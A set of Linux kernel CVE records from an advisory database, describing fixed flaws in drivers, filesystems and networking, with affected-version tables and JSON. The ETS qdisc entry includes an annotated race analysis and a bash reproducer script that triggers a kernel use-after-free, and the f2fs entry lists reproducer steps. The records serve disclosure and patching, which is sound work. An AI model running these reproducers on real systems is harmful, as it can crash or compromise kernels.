rlen value is a user-controlled value, but dtv5100_i2c_msg() does not
check the size of the rlen value. Therefore, if it is set to a value
larger than sizeof(st->data), an out-of-bounds vuln occurs for st->data.
Therefore, we need to add proper range checking to prevent this vuln.
Severity
7.8 (High)
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < c2c293ea7b61f12cdaad1e99a5b4efc58c88960a
(git)
Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < c2305b4c5fc15e20ac06c35738e0578eb4323750 (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < 61f214a878e96e2a8750bf96a98f78c658dba60c (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < 4a54d8fcb093761e4c56eb211cf4e39bf8401fa1 (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < fe3e129ab49806aaaa3f22067ebc75c2dfbe4658 (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < ac92151ff2494130d9fc686055d6bbb9743a673e (git) Affected: 60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817 , < b91e6aafe8d356086cc621bc03e35ba2299e4788 (git) |
|
| Linux | Linux |
Affected:
2.6.28
Unaffected: 0 , < 2.6.28 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.3 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/dvb-usb/dtv5100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c2c293ea7b61f12cdaad1e99a5b4efc58c88960a",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "c2305b4c5fc15e20ac06c35738e0578eb4323750",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
"lessThan": "61f214a878e96e2a8750bf96a98f78c658dba60c",
"status": "affected",
"version": "60688d5e6e6e2ae62f29762d1e3b2aec2dbd3817",
"versionType": "git"
},
{
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CVE-2025-68820 (GCVE-0-2025-68820)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-07-14 12:44
VLAI
EPSS
VEX
Title
ext4: xattr: fix null pointer deref in ext4_raw_inode()
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: xattr: fix null pointer deref in ext4_raw_inode()
If ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),
iloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()
lacks error checking, this will lead to a null pointer dereference
in ext4_raw_inode(), called right after ext4_get_inode_loc().
Found by Linux Verification Center (linuxtesting.org) with SVACE.
Severity
No CVSS data available.
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-06-16 16:55 UTC
Assigner
References
8 references
Impacted products
5 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
76c365fa7e2a8bb85f0190cdb4b8cdc99b2fdce3 , < b72a3476f0c97d02f63a6e9fff127348d55436f6
(git)
Affected: f737418b6de31c962c7192777ee4018906975383 , < 3d8d22e75f7edfa0b30ff27330fd6a1285d594c3 (git) Affected: cf9291a3449b04688b81e32621e88de8f4314b54 , < 190ad0f22ba49f1101182b80e3af50ca2ddfe72f (git) Affected: 362a90cecd36e8a5c415966d0b75b04a0270e4dd , < b5d942922182e82724b7152cb998f540132885ec (git) Affected: eb59cc31b6ea076021d14b04e7faab1636b87d0e , < 5b154e901fda2e98570b8f426a481f5740097dc2 (git) Affected: c8e008b60492cf6fd31ef127aea6d02fd3d314cd , < ce5f54c065a4a7cbb92787f4f140917112350142 (git) Affected: c8e008b60492cf6fd31ef127aea6d02fd3d314cd , < b97cb7d6a051aa6ebd57906df0e26e9e36c26d14 (git) Affected: 6aff941cb0f7d0c897c3698ad2e30672709135e3 (git) Affected: 3bc6317033f365ce578eb6039445fb66162722fd (git) Affected: 836e625b03a666cf93ff5be328c8cb30336db872 (git) Affected: 5.10.237 , < 5.10.248 (semver) Affected: 5.15.181 , < 5.15.198 (semver) Affected: 6.1.135 , < 6.1.160 (semver) Affected: 6.6.88 , < 6.6.120 (semver) Affected: 6.12.24 , < 6.12.64 (semver) Affected: 5.4.293 , < 5.5 (semver) Affected: 6.13.12 , < 6.14 (semver) Affected: 6.14.3 , < 6.15 (semver) |
|
| Linux | Linux |
Affected:
6.15
Unaffected: 0 , < 6.15 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.3 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
|
| Siemens | SIMATIC S7-1500 CPU 1518-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
|
| Siemens | SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
|
| Siemens | SIPLUS S7-1500 CPU 1518-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
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CVE-2025-68821 (GCVE-0-2025-68821)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-05-23 16:03
VLAI
EPSS
VEX
Title
fuse: fix readahead reclaim deadlock
Summary
In the Linux kernel, the following vulnerability has been resolved:
fuse: fix readahead reclaim deadlock
Commit e26ee4efbc79 ("fuse: allocate ff->release_args only if release is
needed") skips allocating ff->release_args if the server does not
implement open. However in doing so, fuse_prepare_release() now skips
grabbing the reference on the inode, which makes it possible for an
inode to be evicted from the dcache while there are inflight readahead
requests. This causes a deadlock if the server triggers reclaim while
servicing the readahead request and reclaim attempts to evict the inode
of the file being read ahead. Since the folio is locked during
readahead, when reclaim evicts the fuse inode and fuse_evict_inode()
attempts to remove all folios associated with the inode from the page
cache (truncate_inode_pages_range()), reclaim will block forever waiting
for the lock since readahead cannot relinquish the lock because it is
itself blocked in reclaim:
>>> stack_trace(1504735)
folio_wait_bit_common (mm/filemap.c:1308:4)
folio_lock (./include/linux/pagemap.h:1052:3)
truncate_inode_pages_range (mm/truncate.c:336:10)
fuse_evict_inode (fs/fuse/inode.c:161:2)
evict (fs/inode.c:704:3)
dentry_unlink_inode (fs/dcache.c:412:3)
__dentry_kill (fs/dcache.c:615:3)
shrink_kill (fs/dcache.c:1060:12)
shrink_dentry_list (fs/dcache.c:1087:3)
prune_dcache_sb (fs/dcache.c:1168:2)
super_cache_scan (fs/super.c:221:10)
do_shrink_slab (mm/shrinker.c:435:9)
shrink_slab (mm/shrinker.c:626:10)
shrink_node (mm/vmscan.c:5951:2)
shrink_zones (mm/vmscan.c:6195:3)
do_try_to_free_pages (mm/vmscan.c:6257:3)
do_swap_page (mm/memory.c:4136:11)
handle_pte_fault (mm/memory.c:5562:10)
handle_mm_fault (mm/memory.c:5870:9)
do_user_addr_fault (arch/x86/mm/fault.c:1338:10)
handle_page_fault (arch/x86/mm/fault.c:1481:3)
exc_page_fault (arch/x86/mm/fault.c:1539:2)
asm_exc_page_fault+0x22/0x27
Fix this deadlock by allocating ff->release_args and grabbing the
reference on the inode when preparing the file for release even if the
server does not implement open. The inode reference will be dropped when
the last reference on the fuse file is dropped (see fuse_file_put() ->
fuse_release_end()).
Severity
No CVSS data available.
Assigner
References
6 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
a39f70d63f4373a598820d9491719e44cd60afe9 , < cbbf3f1bb9f834bb2acbb61ddca74363456e19cd
(git)
Affected: 7d38aa079ed859b73f4460aab89c7619b04963b8 , < 4703bc0e8cd3409acb1476a70cb5b7ff943cf39a (git) Affected: c7ec75f3cbf73bd46f479f7d6942585f765715da , < cf74785c00b8b1c0c4a9dd74bfa9c22d62e2d99f (git) Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < fbba8b00bbe4e4f958a2b0654cc1219a7e6597f6 (git) Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < e0d6de83a4cc22bbac72713f3a58121af36cc411 (git) Affected: e26ee4efbc79610b20e7abe9d96c87f33dacc1ff , < bd5603eaae0aabf527bfb3ce1bb07e979ce5bd50 (git) Affected: 5.15.196 , < 5.15.198 (semver) Affected: 6.1.158 , < 6.1.160 (semver) Affected: 6.6.115 , < 6.6.120 (semver) |
|
| Linux | Linux |
Affected:
6.9
Unaffected: 0 , < 6.9 (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.3 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
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CVE-2025-71064 (GCVE-0-2025-71064)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-07-14 12:44
VLAI
EPSS
VEX
Title
net: hns3: using the num_tqps in the vf driver to apply for resources
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: hns3: using the num_tqps in the vf driver to apply for resources
Currently, hdev->htqp is allocated using hdev->num_tqps, and kinfo->tqp
is allocated using kinfo->num_tqps. However, kinfo->num_tqps is set to
min(new_tqps, hdev->num_tqps); Therefore, kinfo->num_tqps may be smaller
than hdev->num_tqps, which causes some hdev->htqp[i] to remain
uninitialized in hclgevf_knic_setup().
Thus, this patch allocates hdev->htqp and kinfo->tqp using hdev->num_tqps,
ensuring that the lengths of hdev->htqp and kinfo->tqp are consistent
and that all elements are properly initialized.
Severity
No CVSS data available.
Assigner
References
8 references
Impacted products
5 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < c149decd8c18ae6acdd7a6041d74507835cf26e6
(git)
Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < bcefdb288eedac96fd2f583298927e9c6c481489 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < 6cd8a2930df850f4600fe8c57d0662b376520281 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < 1956d47a03eb625951e9e070db39fe2590e27510 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < 429f946a7af3fbf08761d218746cd4afa80a7954 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < 62f28d79a6186a602a9d926a2dbb5b12b6867df7 (git) Affected: e2cb1dec9779ba2d89302a653eb0abaeb8682196 , < c2a16269742e176fccdd0ef9c016a233491a49ad (git) |
|
| Linux | Linux |
Affected:
4.16
Unaffected: 0 , < 4.16 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.3 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
|
| Siemens | SIMATIC S7-1500 CPU 1518-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
|
| Siemens | SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
|
| Siemens | SIPLUS S7-1500 CPU 1518-4 PN/DP MFP |
Affected:
V3.1.6 , < *
(custom)
|
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"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized."
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"url": "https://git.kernel.org/stable/c/bcefdb288eedac96fd2f583298927e9c6c481489"
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"url": "https://git.kernel.org/stable/c/6cd8a2930df850f4600fe8c57d0662b376520281"
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{
"url": "https://git.kernel.org/stable/c/1956d47a03eb625951e9e070db39fe2590e27510"
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"url": "https://git.kernel.org/stable/c/429f946a7af3fbf08761d218746cd4afa80a7954"
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},
{
"url": "https://git.kernel.org/stable/c/c2a16269742e176fccdd0ef9c016a233491a49ad"
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"title": "net: hns3: using the num_tqps in the vf driver to apply for resources",
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"cveId": "CVE-2025-71064",
"datePublished": "2026-01-13T15:31:20.503Z",
"dateReserved": "2026-01-13T15:30:19.646Z",
"dateUpdated": "2026-07-14T12:44:27.207Z",
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CVE-2025-71066 (GCVE-0-2025-71066)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-08-05 12:11
VLAI
EPSS
VEX
Title
net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change
zdi-disclosures@trendmicro.com says:
The vulnerability is a race condition between `ets_qdisc_dequeue` and
`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.
Attacker requires the capability to create new user and network namespace
in order to trigger the bug.
See my additional commentary at the end of the analysis.
Analysis:
static int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,
struct netlink_ext_ack *extack)
{
...
// (1) this lock is preventing .change handler (`ets_qdisc_change`)
//to race with .dequeue handler (`ets_qdisc_dequeue`)
sch_tree_lock(sch);
for (i = nbands; i < oldbands; i++) {
if (i >= q->nstrict && q->classes[i].qdisc->q.qlen)
list_del_init(&q->classes[i].alist);
qdisc_purge_queue(q->classes[i].qdisc);
}
WRITE_ONCE(q->nbands, nbands);
for (i = nstrict; i < q->nstrict; i++) {
if (q->classes[i].qdisc->q.qlen) {
// (2) the class is added to the q->active
list_add_tail(&q->classes[i].alist, &q->active);
q->classes[i].deficit = quanta[i];
}
}
WRITE_ONCE(q->nstrict, nstrict);
memcpy(q->prio2band, priomap, sizeof(priomap));
for (i = 0; i < q->nbands; i++)
WRITE_ONCE(q->classes[i].quantum, quanta[i]);
for (i = oldbands; i < q->nbands; i++) {
q->classes[i].qdisc = queues[i];
if (q->classes[i].qdisc != &noop_qdisc)
qdisc_hash_add(q->classes[i].qdisc, true);
}
// (3) the qdisc is unlocked, now dequeue can be called in parallel
// to the rest of .change handler
sch_tree_unlock(sch);
ets_offload_change(sch);
for (i = q->nbands; i < oldbands; i++) {
// (4) we're reducing the refcount for our class's qdisc and
// freeing it
qdisc_put(q->classes[i].qdisc);
// (5) If we call .dequeue between (4) and (5), we will have
// a strong UAF and we can control RIP
q->classes[i].qdisc = NULL;
WRITE_ONCE(q->classes[i].quantum, 0);
q->classes[i].deficit = 0;
gnet_stats_basic_sync_init(&q->classes[i].bstats);
memset(&q->classes[i].qstats, 0, sizeof(q->classes[i].qstats));
}
return 0;
}
Comment:
This happens because some of the classes have their qdiscs assigned to
NULL, but remain in the active list. This commit fixes this issue by always
removing the class from the active list before deleting and freeing its
associated qdisc
Reproducer Steps
(trimmed version of what was sent by zdi-disclosures@trendmicro.com)
```
DEV="${DEV:-lo}"
ROOT_HANDLE="${ROOT_HANDLE:-1:}"
BAND2_HANDLE="${BAND2_HANDLE:-20:}" # child under 1:2
PING_BYTES="${PING_BYTES:-48}"
PING_COUNT="${PING_COUNT:-200000}"
PING_DST="${PING_DST:-127.0.0.1}"
SLOW_TBF_RATE="${SLOW_TBF_RATE:-8bit}"
SLOW_TBF_BURST="${SLOW_TBF_BURST:-100b}"
SLOW_TBF_LAT="${SLOW_TBF_LAT:-1s}"
cleanup() {
tc qdisc del dev "$DEV" root 2>/dev/null
}
trap cleanup EXIT
ip link set "$DEV" up
tc qdisc del dev "$DEV" root 2>/dev/null || true
tc qdisc add dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2
tc qdisc add dev "$DEV" parent 1:2 handle "$BAND2_HANDLE" \
tbf rate "$SLOW_TBF_RATE" burst "$SLOW_TBF_BURST" latency "$SLOW_TBF_LAT"
tc filter add dev "$DEV" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2
tc -s qdisc ls dev $DEV
ping -I "$DEV" -f -c "$PING_COUNT" -s "$PING_BYTES" -W 0.001 "$PING_DST" \
>/dev/null 2>&1 &
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 0
tc qdisc change dev "$DEV" root handle "$ROOT_HANDLE" ets bands 2 strict 2
tc -s qdisc ls dev $DEV
tc qdisc del dev "$DEV" parent
---truncated---
Severity
7.8 (High)
7.5 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-05-22 03:55 UTC
CWE
- CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
ae2659d2c670252759ee9c823c4e039c0e05a6f2 , < 062d5d544e564473450d72e6af83077c2b2ff7c3
(git)
Affected: e25bdbc7e951ae5728fee1f4c09485df113d013c , < c7f6e7cc14df72b997258216e99d897d2df0dbbd (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < a75d617a4ef08682f5cfaadc01d5141c87e019c9 (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < 9987cda315c08f63a02423fa2f9a1f6602c861a0 (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < 06bfb66a7c8b45e3fed01351a4b087410ae5ef39 (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < 45466141da3c98a0c5fa88be0bc14b4b6a4bd75c (git) Affected: de6d25924c2a8c2988c6a385990cafbe742061bf , < ce052b9402e461a9aded599f5b47e76bc727f7de (git) Affected: 5.10.83 , < 5.10.248 (semver) Affected: 5.15.6 , < 5.15.198 (semver) |
|
| Linux | Linux |
Affected:
5.16
Unaffected: 0 , < 5.16 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.3 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
{
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"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---"
}
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"lang": "en",
"value": "AV:L - Exploitation requires local rtnetlink qdisc configuration and locally generated traffic reaching the ETS dequeue path.\nAC:L - The attacker controls both racing paths by issuing qdisc changes while driving packet dequeue, and can deterministically create the stale active-list state. Although the UAF window is narrow, preemptible, RT, or virtualized scheduling makes it plausible, and the higher-severity tie-break requires L.\nPR:L - RTM_NEWQDISC requires CAP_NET_ADMIN in the target network namespace. An unprivileged user can obtain that capability by creating user and network namespaces on deployments permitting unprivileged user namespaces.\nUI:N - No victim action is required after the attacker configures ETS and generates concurrent traffic.\nS:U - The corruption and resulting kernel compromise occur within the Linux kernel\u2019s existing security authority; standard namespace escape or kernel privilege escalation does not change CVSS scope.\nC:H - The freed Qdisc can be reclaimed with attacker-influenced contents and dereferenced through its operations pointer, supporting kernel memory disclosure primitives.\nI:H - The UAF reaches an indirect peek function call through the freed Qdisc operations pointer, making control-flow hijacking and arbitrary kernel modification defensible.\nA:H - The flaw demonstrably causes a KASAN use-after-free or NULL-pointer kernel oops and can produce a kernel panic."
}
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}
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CVE-2025-71069 (GCVE-0-2025-71069)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-05-11 21:54
VLAI
EPSS
VEX
Title
f2fs: invalidate dentry cache on failed whiteout creation
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: invalidate dentry cache on failed whiteout creation
F2FS can mount filesystems with corrupted directory depth values that
get runtime-clamped to MAX_DIR_HASH_DEPTH. When RENAME_WHITEOUT
operations are performed on such directories, f2fs_rename performs
directory modifications (updating target entry and deleting source
entry) before attempting to add the whiteout entry via f2fs_add_link.
If f2fs_add_link fails due to the corrupted directory structure, the
function returns an error to VFS, but the partial directory
modifications have already been committed to disk. VFS assumes the
entire rename operation failed and does not update the dentry cache,
leaving stale mappings.
In the error path, VFS does not call d_move() to update the dentry
cache. This results in new_dentry still pointing to the old inode
(new_inode) which has already had its i_nlink decremented to zero.
The stale cache causes subsequent operations to incorrectly reference
the freed inode.
This causes subsequent operations to use cached dentry information that
no longer matches the on-disk state. When a second rename targets the
same entry, VFS attempts to decrement i_nlink on the stale inode, which
may already have i_nlink=0, triggering a WARNING in drop_nlink().
Example sequence:
1. First rename (RENAME_WHITEOUT): file2 → file1
- f2fs updates file1 entry on disk (points to inode 8)
- f2fs deletes file2 entry on disk
- f2fs_add_link(whiteout) fails (corrupted directory)
- Returns error to VFS
- VFS does not call d_move() due to error
- VFS cache still has: file1 → inode 7 (stale!)
- inode 7 has i_nlink=0 (already decremented)
2. Second rename: file3 → file1
- VFS uses stale cache: file1 → inode 7
- Tries to drop_nlink on inode 7 (i_nlink already 0)
- WARNING in drop_nlink()
Fix this by explicitly invalidating old_dentry and new_dentry when
f2fs_add_link fails during whiteout creation. This forces VFS to
refresh from disk on subsequent operations, ensuring cache consistency
even when the rename partially succeeds.
Reproducer:
1. Mount F2FS image with corrupted i_current_depth
2. renameat2(file2, file1, RENAME_WHITEOUT)
3. renameat2(file3, file1, 0)
4. System triggers WARNING in drop_nlink()
Severity
No CVSS data available.
Assigner
References
7 references
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 7f2bae0c881aa1e0a6318756df692cc13df2cc83
(git)
Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 3d95ed8cf980fdfa67a3ab9491357521ae576168 (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 64587ab4d1f16fc94f70e04fa87b2e3f69f8a7bb (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 3d65e27e57aaa9d66709fda4cbfb62a87c04a3f5 (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < c89845fae250efdd59c1d4ec60e9e1c652cee4b6 (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < 0dde30753c1e8648665dbe069d814e540ce2fd37 (git) Affected: 7e01e7ad746bc8198a8b46163ddc73a1c7d22339 , < d33f89b34aa313f50f9a512d58dd288999f246b0 (git) |
|
| Linux | Linux |
Affected:
4.2
Unaffected: 0 , < 4.2 (semver) Unaffected: 5.10.248 , ≤ 5.10.* (semver) Unaffected: 5.15.198 , ≤ 5.15.* (semver) Unaffected: 6.1.160 , ≤ 6.1.* (semver) Unaffected: 6.6.120 , ≤ 6.6.* (semver) Unaffected: 6.12.64 , ≤ 6.12.* (semver) Unaffected: 6.18.3 , ≤ 6.18.* (semver) Unaffected: 6.19 , ≤ * (original_commit_for_fix) |
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CVE-2025-71071 (GCVE-0-2025-71071)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:31 – Updated: 2026-05-23 16:03
VLAI
EPSS
VEX
Title
iommu/mediatek: fix use-after-free on probe deferral
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu/mediatek: fix use-after-free on probe deferral
The driver is dropping the references taken to the larb devices during
probe after successful lookup as well as on errors. This can
potentially lead to a use-after-free in case a larb device has not yet
been bound to its driver so that the iommu driver probe defers.
Fix this by keeping the references as expected while the iommu driver is
bound.
Severity
No CVSS data available.
Assigner
References
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| Linux | Linux |
Affected:
8412e5dd24ffc8bc21a00bfaa0b80d4596cdc9da , < 896ec55da3b90bdb9fc04fedc17ad8c359b2eee5
(git)
